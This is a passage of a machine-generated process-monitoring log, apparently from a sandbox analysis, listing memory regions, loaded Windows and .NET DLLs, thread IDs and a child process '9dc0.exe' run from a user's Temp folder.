Region: id = 2185 start_va = 0x4d80000 end_va = 0x4d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 2186 start_va = 0x4d90000 end_va = 0x4d9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d90000" filename = "" Region: id = 2187 start_va = 0x4da0000 end_va = 0x4daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 2188 start_va = 0x4db0000 end_va = 0x4dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004db0000" filename = "" Region: id = 2189 start_va = 0x4dc0000 end_va = 0x4dcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 2190 start_va = 0x4dd0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 2191 start_va = 0x4de0000 end_va = 0x4deffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2192 start_va = 0x4df0000 end_va = 0x4dfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2193 start_va = 0x5480000 end_va = 0x5483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005480000" filename = "" Region: id = 2194 start_va = 0x5490000 end_va = 0x5491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005490000" filename = "" Region: id = 2195 start_va = 0x54a0000 end_va = 0x54affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2196 start_va = 0x54b0000 end_va = 0x54bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2197 start_va = 0x54c0000 end_va = 0x54cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 2198 start_va = 0x54d0000 end_va = 0x54dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2199 start_va = 0x54e0000 end_va = 0x54effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2200 start_va = 0x5980000 end_va = 0x598ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2201 start_va = 0x5990000 end_va = 0x599ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2202 start_va = 0x59a0000 end_va = 0x59a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000059a0000" filename = "" Region: id = 2203 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 2204 start_va = 0x86a0000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 2209 start_va = 0x4a00000 end_va = 0x4a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2210 start_va = 0x4a10000 end_va = 0x4a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 2211 start_va = 0x6280000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2365 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 2511 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2542 start_va = 0x1700000 end_va = 0x1720fff monitored = 0 entry_point = 0x1702300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2543 start_va = 0x1730000 end_va = 0x177efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001730000" filename = "" Region: id = 2544 start_va = 0x1700000 end_va = 0x1720fff monitored = 0 entry_point = 0x1702300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2545 start_va = 0x1700000 end_va = 0x1720fff monitored = 0 entry_point = 0x1702300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2658 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2991 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3228 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 3424 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9869 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 9874 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 9875 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 9876 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 10329 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 10786 start_va = 0x8400000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 12326 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Thread: id = 62 os_tid = 0xd3c Thread: id = 63 os_tid = 0x794 Thread: id = 64 os_tid = 0x798 Thread: id = 65 os_tid = 0x13b0 Thread: id = 66 os_tid = 0x1354 Thread: id = 67 os_tid = 0x1350 Thread: id = 68 os_tid = 0x1320 Thread: id = 69 os_tid = 0x1064 Thread: id = 70 os_tid = 0xccc Thread: id = 71 os_tid = 0x3e8 Thread: id = 72 os_tid = 0x384 Thread: id = 73 os_tid = 0x460 Thread: id = 74 os_tid = 0x3ac Thread: id = 75 os_tid = 0xce8 Thread: id = 76 os_tid = 0x304 Thread: id = 77 os_tid = 0xa7c Thread: id = 78 os_tid = 0xcb0 Thread: id = 79 os_tid = 0x88c Thread: id = 80 os_tid = 0x598 Thread: id = 81 os_tid = 0xec Thread: id = 82 os_tid = 0x59c Thread: id = 83 os_tid = 0x470 Thread: id = 84 os_tid = 0x634 Thread: id = 85 os_tid = 0x918 Thread: id = 86 os_tid = 0xf70 Thread: id = 87 os_tid = 0xf50 Thread: id = 88 os_tid = 0xf3c Thread: id = 89 os_tid = 0xf1c Thread: id = 90 os_tid = 0xf04 Thread: id = 91 os_tid = 0xef4 Thread: id = 92 os_tid = 0xee4 Thread: id = 93 os_tid = 0xee0 Thread: id = 94 os_tid = 0xe64 Thread: id = 95 os_tid = 0xe48 Thread: id = 96 os_tid = 0xe44 Thread: id = 97 os_tid = 0xe3c Thread: id = 98 os_tid = 0xe14 Thread: id = 99 os_tid = 0xd94 Thread: id = 100 os_tid = 0xcfc Thread: id = 101 os_tid = 0xb04 Thread: id = 102 os_tid = 0xac4 Thread: id = 103 os_tid = 0xb48 Thread: id = 104 os_tid = 0xb44 Thread: id = 105 os_tid = 0xb40 Thread: id = 106 os_tid = 0xaec Thread: id = 107 os_tid = 0xae4 Thread: id = 108 os_tid = 0xae0 Thread: id = 109 os_tid = 0xaa8 Thread: id = 110 os_tid = 0xa54 Thread: id = 111 os_tid = 0xa40 Thread: id = 112 os_tid = 0xa28 Thread: id = 113 os_tid = 0xa0c Thread: id = 114 os_tid = 0xa08 Thread: id = 115 os_tid = 0x9ec Thread: id = 116 os_tid = 0x9e4 Thread: id = 117 os_tid = 0x9e0 Thread: id = 118 os_tid = 0x9dc Thread: id = 119 os_tid = 0x9d8 Thread: id = 120 os_tid = 0x9d4 Thread: id = 121 os_tid = 0x950 Thread: id = 122 os_tid = 0x93c Thread: id = 123 os_tid = 0x91c Thread: id = 124 os_tid = 0x830 Thread: id = 125 os_tid = 0x82c Thread: id = 126 os_tid = 0x4e0 Thread: id = 127 os_tid = 0x488 Thread: id = 128 os_tid = 0x520 Thread: id = 129 os_tid = 0x48c Thread: id = 130 os_tid = 0x630 Thread: id = 131 os_tid = 0x4dc Thread: id = 132 os_tid = 0x4a8 Thread: id = 133 os_tid = 0x49c Thread: id = 134 os_tid = 0x44c Thread: id = 135 os_tid = 0x434 Thread: id = 136 os_tid = 0x408 Thread: id = 137 os_tid = 0x404 Thread: id = 138 os_tid = 0x2b0 Thread: id = 139 os_tid = 0x294 Thread: id = 140 os_tid = 0x168 Thread: id = 141 os_tid = 0x170 Thread: id = 142 os_tid = 0x288 Thread: id = 143 os_tid = 0x284 Thread: id = 144 os_tid = 0x264 Thread: id = 145 os_tid = 0x274 Thread: id = 146 os_tid = 0x15c Thread: id = 147 os_tid = 0xf4 Thread: id = 148 os_tid = 0x137c Thread: id = 149 os_tid = 0x5a4 Thread: id = 150 os_tid = 0x1384 Thread: id = 205 os_tid = 0x2a8 Thread: id = 245 os_tid = 0x8fc Thread: id = 246 os_tid = 0xf84 Thread: id = 247 os_tid = 0x1070 Thread: id = 248 os_tid = 0x188 Thread: id = 264 os_tid = 0x770 Process: id = "5" image_name = "9dc0.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9dc0.exe" page_root = "0x36acf000" os_pid = "0x6d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x640" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\9DC0.exe" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2266 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2267 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2268 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2269 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2270 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2271 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2272 start_va = 0x400000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2273 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2274 start_va = 0x140000000 end_va = 0x140011fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "9dc0.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\9DC0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9dc0.exe") Region: id = 2275 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2276 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2281 start_va = 0x930000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2282 start_va = 0x7ffb1c980000 end_va = 0x7ffb1c9e7fff monitored = 1 entry_point = 0x7ffb1c984970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 2283 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2284 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2285 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2286 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 2287 start_va = 0x80000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2430 start_va = 0x800000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2431 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2432 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2433 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 2434 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2435 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2436 start_va = 0xa30000 end_va = 0xe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2437 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2438 start_va = 0x140000 end_va = 0x146fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2439 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2440 start_va = 0xe30000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2441 start_va = 0x150000 end_va = 0x156fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2442 start_va = 0x7ffb187b0000 end_va = 0x7ffb18847fff monitored = 1 entry_point = 0x7ffb187b1000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 2443 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2444 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2445 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2446 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2447 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2448 start_va = 0x160000 end_va = 0x198fff monitored = 0 entry_point = 0x1612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2449 start_va = 0xf80000 end_va = 0x1107fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 2450 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2451 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2452 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2453 start_va = 0x1110000 end_va = 0x1290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 2454 start_va = 0x12a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 2455 start_va = 0x180000 end_va = 0x18efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "9dc0.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\9DC0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\9dc0.exe") Region: id = 2456 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2460 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2464 start_va = 0x7ffb09400000 end_va = 0x7ffb09d8dfff monitored = 1 entry_point = 0x7ffb0952d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 2465 start_va = 0x7ffb186b0000 end_va = 0x7ffb187a6fff monitored = 0 entry_point = 0x7ffb186d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 2466 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 2467 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2468 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2469 start_va = 0x7ffaa9cb0000 end_va = 0x7ffaa9cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9cb0000" filename = "" Region: id = 2470 start_va = 0x7ffaa9cc0000 end_va = 0x7ffaa9ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9cc0000" filename = "" Region: id = 2471 start_va = 0x7ffaa9cd0000 end_va = 0x7ffaa9d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9cd0000" filename = "" Region: id = 2472 start_va = 0x7ffaa9d60000 end_va = 0x7ffaa9dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9d60000" filename = "" Region: id = 2473 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2474 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2475 start_va = 0x800000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2476 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 2477 start_va = 0xe30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2478 start_va = 0xf70000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 2479 start_va = 0x26a0000 end_va = 0x2a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 2480 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2481 start_va = 0x2aa0000 end_va = 0x1aa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 2482 start_va = 0x1aaa0000 end_va = 0x1ae0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aaa0000" filename = "" Region: id = 2483 start_va = 0x1ae10000 end_va = 0x1af15fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae10000" filename = "" Region: id = 2484 start_va = 0x1af20000 end_va = 0x1b31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001af20000" filename = "" Region: id = 2485 start_va = 0x1b320000 end_va = 0x1b656fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2498 start_va = 0x7ffb07f30000 end_va = 0x7ffb093f5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Region: id = 2499 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2500 start_va = 0xe30000 end_va = 0xeeffff monitored = 0 entry_point = 0xe50da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2501 start_va = 0xf30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 2502 start_va = 0xe30000 end_va = 0xf0cfff monitored = 0 entry_point = 0xe8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2503 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2504 start_va = 0x1b660000 end_va = 0x1b7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b660000" filename = "" Region: id = 2512 start_va = 0x7ff5ffe30000 end_va = 0x7ff5ffecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5ffe30000" filename = "" Region: id = 2513 start_va = 0x7ff5ffe20000 end_va = 0x7ff5ffe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5ffe20000" filename = "" Region: id = 2515 start_va = 0x7ffaa9dd0000 end_va = 0x7ffaa9e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9dd0000" filename = "" Region: id = 2516 start_va = 0x7ffaa9e10000 end_va = 0x7ffaa9e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9e10000" filename = "" Region: id = 2517 start_va = 0x7ffb0e640000 end_va = 0x7ffb0e744fff monitored = 1 entry_point = 0x7ffb0e64107c region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 2521 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2522 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2527 start_va = 0x7ffb07310000 end_va = 0x7ffb07f23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll") Region: id = 2528 start_va = 0x1e0000 